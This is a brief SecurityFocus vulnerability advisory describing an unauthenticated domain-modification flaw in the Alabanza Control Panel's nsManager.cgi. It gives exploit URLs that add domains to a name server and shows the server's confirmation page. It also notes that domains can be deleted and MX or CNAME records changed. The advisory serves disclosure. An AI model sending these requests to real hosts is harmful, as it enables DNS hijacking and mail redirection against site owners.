Alabanza Control Panel Domain Modification Vulnerability

To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):

http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm

Accessing the following URL:

http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm

will display a page stating:

"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!

Please click here to go back."

From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.


 

Privacy Statement
Copyright 2010, SecurityFocus